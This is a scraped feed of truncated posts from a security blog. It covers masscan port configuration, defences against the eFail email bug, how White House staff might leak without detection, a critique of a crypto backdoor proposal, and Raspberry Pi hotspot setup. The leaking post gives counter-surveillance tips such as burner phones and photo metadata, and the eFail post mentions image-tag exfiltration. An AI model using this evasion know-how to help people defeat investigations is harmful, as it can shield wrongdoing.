command:sysctl net.inet.ip.portrange.first net.inet.ip.portrange.lastOn my laptop, which is probably the default for macOS, I get the following range. Sniffing with Wireshark confirms this is the range used for source ports for outgoing connections.net.inet.ip.portrange.first: 49152net.inet.ip.portrange.last: 65535So this means I shouldn't use source ports anywhere in the range 49152 to 65535. On my laptop, I've decided to use for masscan the ports 40000 to 41023. The range masscan uses must be a power of 2, so here I'm using 1024 (two to the tenth power).To configure masscan, I can either type the parameter "--source-port 40000-41023" every time I run the program, or I can add the following line to /etc/masscan/masscan.conf. Remember that by default, masscan will look in that configuration file for any configuration parameters, so you don't have to keep retyping them on the command line.source-port = 40000-41023Next, I need to add the following firewall rule to the bottom of /etc/pf.conf:block in proto tcp from any to any port 40000 >< 41024However, we aren't do]]> 2018-05-20T17:15:52+00:00 https://blog.erratasec.com/2018/05/masscan-macos-and-firewall.html www.secnews.physaphae.fr/article.php?IdArticle=662267 False None None None Errata Security - Errata Security Some notes on eFail Disable remote/external content in emailThe most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don't even see it:Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can use the "remote content" in emails, you are fine. Likewise, some have recommend disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.I couldn't replicate the direct exfiltrationThere rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like]]> 2018-05-14T09:05:47+00:00 https://blog.erratasec.com/2018/05/some-notes-on-efail.html www.secnews.physaphae.fr/article.php?IdArticle=647877 False None None None Errata Security - Errata Security How to leak securely, for White House staffers guy assigned to crack down on unauthorized White House leaks. It's necessarily light on technical details, so I thought I'd write up some guesses, either as a guide for future reporters asking questions, or for people who want to know how they can safely leak information.It should come as no surprise that your work email and phone are already monitored. They can get every email you've sent or received, even if you've deleted it. They can get every text message you've sent or received, the metadata of every phone call sent or received, and so forth.To a lesser extent, this also applies to your well-known personal phone and email accounts. Law enforcement can get the metadata (which includes text messages) for these things without a warrant. In the above story, the person doing the investigation wasn't law enforcement, but I'm not sure that's a significant barrier if they can pass things onto the Secret Service or something.The danger here isn't that you used these things to leak, it's that you've used these things to converse with the reporter before you made the decision to leak. That's what happened in the Reality Winner case: she communicated with The Intercept before she allegedly leaked a printed document to them via postal mail. While it wasn't conclusive enough to convict her, the innocent emails certainly put the investigators on her trail.The path to leaking often starts this way: innocent actions before the decision to leak was made that will come back to haunt the person afterwards. That includes emails. That also includes Google searches. That includes websites you visit (like this one). I'm not sure how to solve this, except that if you've been in contact with The Intercept, and then you decide to leak, send it to anybody but The Intercept.By the way, the other thing that caught Reality Winner is the records they had of her accessing files and printing them on a printer. Depending where you work, they may have a record of every file you've accessed, every intranet page you visited. Because of the way printers put secret dots on documents, investigators know precisely which printer and time the document leaked to The Intercept was printed.Photographs suffer the same problem: your camera and phone tag the photographs with GPS coordinates and time the photograph was taken, as well as information about the camera. This accidentally exposed John McAfee's hiding location when Vice took pictures of him a few years ago. Some people leak by taking pictures of the screen -- use a camera without GPS for this (meaning, a really old camera you bought from a pawnshop).These examples should impress upon you the dangers of not understanding technology. As soon as you do something to evade surveillance you know about, you may get caught by surveillance you don't know about.If you nonetheless want to continue forward, the next step may be to get a "burner phone". You can get an adequate Android "prepaid" phone for cash at the local Walmart, electronics store, or phone store.There's some problems with such phones, though. They can often be tracked back to the store that sold them, and the store will have security cameras that record you making the purchase. License plate readers and GPS tracking on your existing phone may also place you at that Walmart.I don't know how to resolve these problems. Perhaps the best is grow a beard and on the last day of your vacation, color your hair, take a long bike/metro ride (without y]]> 2018-05-13T23:21:32+00:00 https://blog.erratasec.com/2018/05/how-to-leak-securely-for-white-house.html www.secnews.physaphae.fr/article.php?IdArticle=646432 False None None None Errata Security - Errata Security No, Ray Ozzie hasn\'t solved crypto backdoors Ray Ozzie may have a solution to the crypto backdoor problem. No, he hasn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.The vault doesn't scaleYes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates. That this scales seems to validate Ozzie's proposal.But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was recently shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the SSL bad certificate, so while damaging, it's not catastrophic.But with Ozzie's scheme, equivalent attacks would be catastrophic, as it would lead to unlocking the phone and stealing all of somebody's secrets.In particular, consider what would happen if LetsEncrypt's certificate was stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but then his scheme includes none of the many protections necessary to make SSL work.What I'm trying to show here is that in a lab, it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.Cryptography is about people more than mathWe have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics.It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be. (I learned the fallacy of One Time Pad's on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads).The same is true with Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure it the human element.How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed? How can the law enforcement agent communicate securely with the Apple employee?You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, ]]> 2018-04-25T16:46:42+00:00 https://blog.erratasec.com/2018/04/no-ray-ozzie-hasnt-solved-crypto.html www.secnews.physaphae.fr/article.php?IdArticle=614398 False Guideline None None Errata Security - Errata Security OMG The Stupid It Burns 2018-04-22T19:25:25+00:00 https://blog.erratasec.com/2018/04/omg-stupid-it-burns.html www.secnews.physaphae.fr/article.php?IdArticle=606789 False None Wannacry None Errata Security - Errata Security Notes on setting up Raspberry Pi 3 as WiFi hotspot I got it working using the instructions here. There are a few additional notes, which is why I'm writing this blogpost, so I remember them.https://www.raspberrypi.org/documentation/configuration/wireless/access-point.mdI'm using the RPi-3-B and not the RPi-3-B+, and the latest version of Raspbian at the time of this writing, "Raspbian Stretch Lite 2018-3-13".Some things didn't work as described. The first is that it couldn't find the package "hostapd". That solution was to run "apt-get update" a second time.The second problem was error message about the NAT not working when trying to set the masquerade rule. That's because the 'upgrade' updates the kernel, making the running system out-of-date with the files on the disk. The solution to that is make sure you reboot after upgrading.Thus, what you do at the start is:apt-get updateapt-get upgradeapt-get updateshutdown -r nowThen it's just "apt-get install tcpdump" and start capturing on wlan0. This will get the non-monitor-mode Ethernet frames, which is what I want.]]> 2018-04-16T08:35:43+00:00 https://blog.erratasec.com/2018/04/notes-on-setting-up-raspberry-pi-3-as.html www.secnews.physaphae.fr/article.php?IdArticle=589907 False None None None